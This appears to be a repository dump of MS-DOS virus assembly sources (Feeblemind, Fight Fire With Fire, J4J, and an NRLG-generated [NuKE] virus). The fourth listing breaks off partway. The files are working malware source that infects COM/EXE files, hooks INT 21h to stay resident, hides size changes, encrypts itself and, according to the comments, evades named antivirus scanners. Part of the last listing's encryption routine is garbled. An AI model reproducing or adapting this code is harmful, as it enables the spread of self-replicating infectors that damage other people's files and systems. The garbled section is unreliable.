Mov Word Ptr Cs:[Old21],Ax
And Word Ptr Ss:[Bp][6],0fffeh
Pop Ax
Einde: Pop Bp
Iret
Endbyte Db 0
Vlen Equ $-Start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/F-Index/Virus.MSDOS.Unknown.feeble.asm
+120
View File
@@ -0,0 +1,120 @@
;
; Feeblemind
;
Start: Jmp Install
Old21 Dd 0
Org21 Dd 0
Inc10: Add Ah,10h
Eoi: Jmp Dword Ptr Cs:[Org21]
New21: Sub Ah,10h
Cmp Ax,3b00h
Jne Inc10
Push Ax
Push Bx
Push Cx
Push Dx
Push Ds
Push Es
Push Si
Push Di
Mov Ax,3d02h
Pushf
Call Dword ptr Cs:[Old21]
Xchg Ax,Bx
Mov Ah,30h
Add Ah,10h
Mov Cx,VLen
Lea Dx,Start
Mov Ds,Cs
Pushf
Call Dword ptr Cs:[Old21]
Mov Ah,3eh
Pushf
Call Dword Ptr Cs:[old21]
Pop Di
Pop Si
Pop Es
Pop Ds
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Jmp EOI
Db '[Feeblemind]'
Install: Mov Ax,3501h
Int 21h
Mov Word Ptr Cs:[Old1],Bx
Mov Word Ptr Cs:[Old1][2],Es
Mov Ax,2501h
Mov Ds,Cs
Lea Dx,New1
Int 21h
Cli
Pushf
Pop Ax
Or Ah,1
Push Ax
Popf
Sti
Mov Ah,30h
Int 21h
Cli
Pushf
Pop Ax
And Ah,0feh
Push Ax
Popf
Sti
Mov Ds,Word ptr Cs:[Old1][2]
Mov Dx,Word ptr Cs:[Old1]
Mov Ax,2501h
Int 21h
Mov Ax,1521h
Add Ah,20h
Int 21h
Mov Word Ptr Cs:[Org21],Bx
Mov Word Ptr Cs:[Org21][2],Es
Mov Ax,1521h
Add Ah,10h
Mov Ds,Cs
Lea Dx,New21
Int 21h
Lea Dx,EndByte
Int 27h
Old1 Dd 0
New1: Push Bp
Mov Bp,Sp
Cmp Word Ptr Ss:[Bp][4],116h
Jne Einde
Push Ax
Mov Ax,Ss:[Bp][4]
Mov Word Ptr Cs:[Old21][2],Ax
Mov Ax,Ss:[Bp][2]
Mov Word Ptr Cs:[Old21],Ax
And Word Ptr Ss:[Bp][6],0fffeh
Pop Ax
Einde: Pop Bp
Iret
Endbyte Db 0
Vlen Equ $-Start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/F-Index/Virus.MSDOS.Unknown.ffire.asm
+256
View File
@@ -0,0 +1,256 @@
; VirusName: Fight Fire With Fire
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-22-1993
;
; This is an mutation of 7th-son from 'Unknown'.
; Many thanks to the scratch coder of 7th-son.
;
; We've tried this virus ourself, and it works just fine.
; Non-overwriting, adds 473 to any comfile over 1701 bytes,
; in current directory. No bugs have been reported.
; Originally from the Netherlands, in 1991.
;
; This is the second real mutation of 7th-son.
;
; McAfee Scan v105 can't find it, and
; S&S Toolkit 6.5 don't find it either.
;
; I haven't tried with scanners like Fprot/Tbscan,
; but they will probably report some virus structure.
;
; Best Regards : [Metal Militia]
; [The Unforgiven]
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ quit - start
MINTARGET equ 1701 ; MINIMUM bytes of file to infect
MAXTARGET equ -(FILELEN+40h) ; MAX bytes of file to infect
org 100h
.RADIX 16
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
begin: db 5Dh
jmp start
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: call start2
start2: pop bp
push cs
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
movsw
movsw
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset quit] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0808h
jne verder
lea dx,[bp+offset sontxt-4] ;9th son of a 9th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,5Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
begbuf db 0CDh, 20h, 0, 0
newbeg db 5Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Fight Fire With Fire...',0Dh, 0Ah, '$' ;printed after
grandfather db 0 ;XX infections
father db 0
filename db '*.COM',0 ; File(s) to infect
db 'Soon to fill our lungs the hot winds of death '
db 'The gods are laughing, so take your last breath '
db 'é]`x·u '
db 'Immortal Riot..Death Greets me warm..'
quit:
cseg ends
end begin

MSDOS/F-Index/Virus.MSDOS.Unknown.fil.asm
+909
View File
@@ -0,0 +1,909 @@
;J4J - Jump For Joy, released 31 Jan 92, (c) Charlie of Demoralized Youth
;------------------------------------------------------------------------
;This source has been lying around for a veeeeeery long time, and I will
;*NOT* continue to make newer versions of J4J, so that is the reason
;why I release the source.
;
;It's been 'bout a month since my last glance on it, so it's maybe full
;of bugs, but anyways; assemble with A86
;
;Some idea's were taken from Omicron / FLIP B (Just the startup), but
;the rest was done by CHARLIE of DEMORALIZED YOUTH!
;
;Fuck this code up however you like...
tsr_bytes equ 1024
tsr_para equ (4096 / 16)
cpt1 equ $
mov ax,1991
mov bx,ax
mov cx,ax
add ax,13881
int 21h
cmp ax,cx
je fail
cmp sp,-10h
jb fail
mov ax,cs
dec ax
mov es,ax
cmp byte es:[0000h],'Z'
jne fail
mov ax,es:[0003h]
sub ax,tsr_para
jc fail
mov es:[0003h],ax
sub word ptr es:[0012h],tsr_para
mov es,es:[0012h]
call $+3
cpt3 equ $
pop si
mov bx,si
sub si,(cpt3-cpt1)
add si,(cpt4-cpt1)
push cs
push si
mov si,bx
sub si,(cpt3-cpt1)
mov cx,offset total-100h
mov di,100h
push es
rep movsb
mov di,17Dh+2
push di
retf
cpt4 equ $
fail:
mov ax,100h
push ax
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp
push cs
push cs
pop es
pop ds
mov word [100h],20CDh
rpl1 equ $-2
mov byte [102h],90h
rpl2 equ $-1
ret
cpt2 equ $
jmp init
fcb_open dw offset fcb_open_cont
exec dw offset back
open_handle dw offset back
new_int_21:
pushf
cmp ah,0Fh ;open file using FCB's
jne not_open_fcb
call fcb_to_asciiz
push dx
push ds
push cs
pop ds
mov dx,offset file
push cs:[fcb_open]
jmp file_main
fcb_open_cont:
pop ds
pop dx
jmp back
not_open_fcb:
;cmp ah,4Eh
;je handle_dir
;cmp ah,4Fh
;je handle_dir
cmp ah,11h
je fcb_dir
cmp ah,12h
je fcb_dir
cmp ah,3Eh
jne clodd
cmp bx,1991
jne clodd
xchg ax,bx
popf
iret
clodd:
cmp ah,3Dh
jne last_chance
push cs:[open_handle]
jmp file_main
last_chance:
cmp ax,4B00h
jne back
push cs:[exec]
jmp file_main
back:
popf
db 0EAh
old_int_21 dw 0,0
handle_dir:
popf
call int21
pushf
jnc back_handle_dir
cmp ax,0
jne back_handle_dir
call stealth_dir_handle
sti
back_handle_dir:
popf
iret
fcb_dir:
popf
call int21
pushf
cmp al,00h
jne back_fcb_dir
call stealth_dir_fcb
sti
back_fcb_dir:
popf
iret
fcb_fname equ 80h+1
fcb_fext equ 80h+1+8
f_attr equ 80h+15h
f_time equ 80h+16h
f_date equ 80h+18h
f_size equ 80h+1Ah
f_asciiz equ 80h+1Eh
f_handle equ 80h
f_head_buffer equ 80h+2
f_tail_buffer equ 80h-3
f_type equ 80h+6
repl0: db 0E8h,?,? ;call ????
;repl1: db 0C7h,6,0,1,?,? ;mov word [0100h],????
; db 0C6h,6,2,1,? ;mov byte [0102h],??
repl2: push bp
mov bp,sp
sub word [bp+2],3
pop bp
repl3:
db 'Elo, Elo, lam  sabakt ni?'
file_main:
pushf
;call other_file_type_check
;jnc file_main_pr1
jmp file_main_pr1
popf
jmp back
file_main_pr1:
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
push cs
pop es
mov si,dx
mov di,offset file
cld
mov cx,65
rep movsb
push cs
pop ds
call setup_24
;call cpu_check
;cmp ax,1
;je file_slutt
call file_info_get
jc file_is_done
call mekke_fil
file_is_done:
call file_info_set
file_slutt:
call rest_24
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret ;jmp back
file db 65 dup(0)
old_dta dw ?,?
file_info_get:
mov ah,2Fh ;get DTA address
call int21
mov old_dta[2],es
mov old_dta[0],bx
mov ah,1Ah ;set DTA address
push cs
pop ds
mov dx,80h
call int21
mov ah,4Eh ;FIND FIRST (get info about
mov cx,1+2+32 ;our file)
mov dx,offset file
call int21
jnc file_info_get_ok
stc
ret
stc
ret
file_info_get_ok:
clc
test word [f_attr],4 ;is the System attr. set?
jnz offset file_info_get_ok-2 ;yeah, so don't do it..
cmp word [fcb_fname],'OC' ;like in: COmmand.com
je offset file_info_get_ok-2 ;the command-interpreter
cmp word [fcb_fname],'BI' ;like in: IBmbio.com and IBmdos.com
je offset file_info_get_ok-2 ;the startup files for IBM-dos
cmp word [fcb_fext],'YS' ;like in: country.SYs
je offset file_info_get_ok-2 ;device drivers and .SYS files
mov ax,4301h ;set attribute
xor cx,cx ;attr=0
mov dx,offset file
call int21
mov ax,3D02h ;open file
mov dx,offset file
call int21
jnc fig_open
fig_fail:
stc
ret
fig_open:
mov [f_handle],ax
mov bx,ax
mov ah,3Fh ;read from file
mov cx,3 ;3 bytes
mov dx,f_head_buffer
call int21
jnc fig_read
jmp fig_fail
fig_read:
cmp ax,3
jne fig_fail
mov ax,4200h
xor cx,cx
mov dx,[f_size]
sub dx,3
mov bx,[f_handle]
call int21
mov ah,3Fh
mov cx,3
mov dx,f_tail_buffer
call int21
cmp word [f_size+2],0
jnz fig_fail
cmp [f_size],60000
ja fig_fail
cmp word [f_head_buffer],'MZ' ;EXE 'ZM' ?
je file_is_exe
cmp word [f_head_buffer],'ZM' ;EXE 'MZ' ?
je file_is_exe
cmp word [f_head_buffer],-1 ;Device Driver ?
je fig_fail
mov byte [f_type],0 ;filetype = COM
clc
ret
file_is_exe:
mov byte [f_type],1 ;filetype = EXE
clc
ret
file_info_set:
mov ah,1Ah ;set DTA address
mov dx,old_dta[0]
mov bx,old_dta[2]
mov ds,bx
call int21
push cs
pop ds
mov ax,4301h ;restore ATTRibutes
mov cx,[f_attr]
mov dx,offset file
call int21
mov ax,5701h ;restore DATE & TIME
mov bx,[f_handle]
mov cx,[f_time]
and cl,255-31
or cl,30
mov dx,[f_date]
call int21
mov ah,3Eh ;close file
mov bx,[f_handle]
call int21
ret
db '¨­¨--?!?'
mekke_fil:
cmp [f_size],1023
ja not_one_n0
stc
ret
not_one_n0:
cmp byte ptr [f_type],0
je not_one_n1
stc
ret
not_one_n1:
cmp word ptr [f_tail_buffer],'4J'
jne not_one
stc
ret
not_one:
mov ax,[f_size] ;calculate CALL
sub ax,3 ;length
mov repl0[1],ax
mov ax,word [f_head_buffer]
mov bl,byte [f_head_buffer]+2
mov [offset rpl1],ax
mov [offset rpl2],bl
; mov word ptr repl1[4],ax ;restore orig bytes
; mov repl1[10],bl ;after CALL...
mov ax,4200h ;seek to file_start
mov bx,[f_handle]
xor cx,cx
mov dx,cx
call int21
mov ah,40h ;write CALL XXXX
mov bx,[f_handle]
mov cx,3 ;3 bytes
mov dx,offset repl0
call int21
mov ax,4202h ;seek to EOF
mov bx,[f_handle]
xor cx,cx
mov dx,cx
call int21
; mov ah,40h ;write startup-code
; mov bx,[f_handle]
; mov cx,(offset repl3)-offset repl1
; ;???? bytes
; mov dx,offset repl1
; call int21
; jc replace_them_now
mov ah,40h ;write main code
mov bx,[f_handle]
mov cx,offset total-100h
mov dx,100h
call int21
jc $+2+1+1
clc
ret
replace_them_now:
mov ax,4200h ;seek to beginning
mov bx,[f_handle] ;of the file
xor cx,cx
mov dx,cx
call int21
mov ah,40h ;error, so write
mov bx,[f_handle] ;back 3 first bytes
mov cx,3
mov dx,f_head_buffer
call int21
stc
ret
db 'Charlie says: Support ()DEMORALIZED YOUTH() '
;;*************************************************************
;;* CPU checker, coded by Data Disruptor / RABiD Nat'nl Corp. *
;;*************************************************************
;cpu_check:
; xor ax,ax
; push ax
; popf
; pushf
; pop ax
; and ax,0f000h
; cmp ax,0f000h
; je mc_8086
; mov ax,0f000h
; push ax
; popf
; pushf
; pop ax
; and ax,0f000h
; jz mc_80286
; mov ax,3
; ret
;mc_80286:
; mov ax,2
; ret
;mc_8086:
; mov ax,1
; ret
;***************************************
;
; Call previously saved Int 21h Handler
;
;***************************************
int21:
pushf
call dword ptr cs:old_int_21
ret
;**********************************************
;
; Int 24h (Critical Error Handler) Code & Data
;
;**********************************************
err dw 0
old_24 dw ?,?
new_24: inc cs:err
mov al,0
stc
iret
;****************************************************************
;
; Fix so that Int 24h (Critical Error Handler) won't display the
; "abort, retry, fail?" message
;
;****************************************************************
setup_24:
xor ax,ax
mov ds,ax
les bx,[24h*4]
push cs
pop ds
mov word ptr old_24[0],bx
mov word ptr old_24[2],es
mov ds,ax
mov word ptr [24h*4],offset new_24
mov word ptr [24h*4+2],cs
push cs
push cs
pop es
pop ds
ret
;**********************************************************
;
; Restore original Int 24h (Critical Error Handler) vector
;
;**********************************************************
rest_24:
les bx,cs:old_24
xor ax,ax
mov ds,ax
mov word ptr [24h*4],bx
mov word ptr [24h*4+2],es
push cs
pop ds
ret
;*********************************************************
;
; Check if the filename has got an extension of .COM or
; .EXE. Returns with CY if not a valid filetype, or NC if
; it is a valid one.
;
;*********************************************************
other_fail:
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
stc ;return with CY
ret
other_file_type_check: ;here the main routine starts
pushf
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp
mov di,dx
push ds
pop es
cld
mov cx,127
xor al,al
repnz scasb
jne other_fail
dec di
dec di
dec di
dec di
dec di
xchg si,di
lodsb
cmp al,'.'
jne other_fail
lodsw
and ax,0DFDFh
cmp ax,'OC'
je other_okfil
cmp ax,'XE'
je other_okfil
jmp other_fail
other_okfil:
lodsb
and al,0DFh
cmp al,'M'
je other_okfil2
cmp al,'E'
jne other_fail
other_okfil2:
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
clc ;return with NC
ret
stealth_dir_handle:
jc done_stealthing_handle
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2Fh
call int21
mov ax,word ptr es:[bx+16h]
mov ah,1Eh
and al,1Fh
cmp al,ah
jne done_stealthing_handle
cmp word es:[bx+1Ah+2],0
jne done_stealthing_handle
mov ax,word es:[bx+1Ah]
sub ax,(offset total)-100h
jc done_stealthing_handle
mov word es:[bx+1Ah],ax
done_stealthing_handle:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret
stealth_dir_fcb:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2Fh
call int21
; mov es,ds
; mov bx,dx
mov ax,word ptr es:[bx+14+10h] ;16h]
mov ah,30 ;1Eh
and al,31 ;1Fh
cmp al,ah
jne done_stealthing_fcb
cmp word es:[bx+22+10h],0 ;+10h+2],0
jne done_stealthing_fcb
mov ax,word es:[bx+20+10h] ;+10h]
sub ax,(offset total)-100h
jc done_stealthing_fcb
mov word es:[bx+20+10h],ax
done_stealthing_fcb:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret
init:
cli
push cs
push cs
pop ds
pop es
mov ax,3521h
int 21h
mov word ptr old_int_21[0],bx
mov word ptr old_int_21[2],es
mov dx,offset new_int_21
mov ax,2521h
int 21h
sti
retf
fcb_to_asciiz:
pushf
push ax
push cx
push si
push di
push es
push cs
pop es
mov di,offset file
cld
mov si,dx ;fcb_start
lodsb
cmp al,0
je fcb_in_current_dir
add al,'A'
stosb
mov al,':'
stosb
jmp anyway
fcb_in_current_dir:
inc si
anyway:
mov si,dx
inc si
mov cx,8
fcb_file_name_xfer:
lodsb
cmp al,' '
je fcb_done_1
stosb
loop fcb_file_name_xfer
fcb_done_1:
mov al,'.'
stosb
mov si,dx ;fcb_start
add si,1+8
mov cx,3
fcb_file_ext_xfer:
lodsb
cmp al,' '
je fcb_done_2
stosb
loop fcb_file_ext_xfer
fcb_done_2:
mov al,0
stosb
pop es
pop di
pop si
pop cx
pop ax
popf
ret
size dw (offset total)-100h
db 'J4J'
total:

MSDOS/F-Index/Virus.MSDOS.Unknown.file_id.diz
+3
View File
@@ -0,0 +1,3 @@
Bit Addict [TridenT] - A collection
of his viruses, code and sources.
<-Cicatrix-|05/95> Update 1
MSDOS/F-Index/Virus.MSDOS.Unknown.fireant.asm
+438
View File
@@ -0,0 +1,438 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿxor word ptr [di],0e3ddh
xor word ptr [di],0dddbh
inc word ptr [di]
add byte ptr [di],059h
inc word ptr [di]
inc word ptr [di]
add word ptr [di],0b6bh
inc word ptr [di]
sub word ptr [di],01654h
sub word ptr [di],077c2h
sub byte ptr [di],05dh
not word ptr [di]
sub byte ptr [di],0c4h
xor word ptr [di],09e43h
inc word ptr [di]
inc word ptr [di]
not byte ptr [di]
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code rd ptr [di],0b6bh
dec word ptr [di]
dec word ptr [di]
sub byte ptr [di],059h
dec word ptr [di]
xor word ptr [di],0dddbh
xor word ptr [di],0e3ddh
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
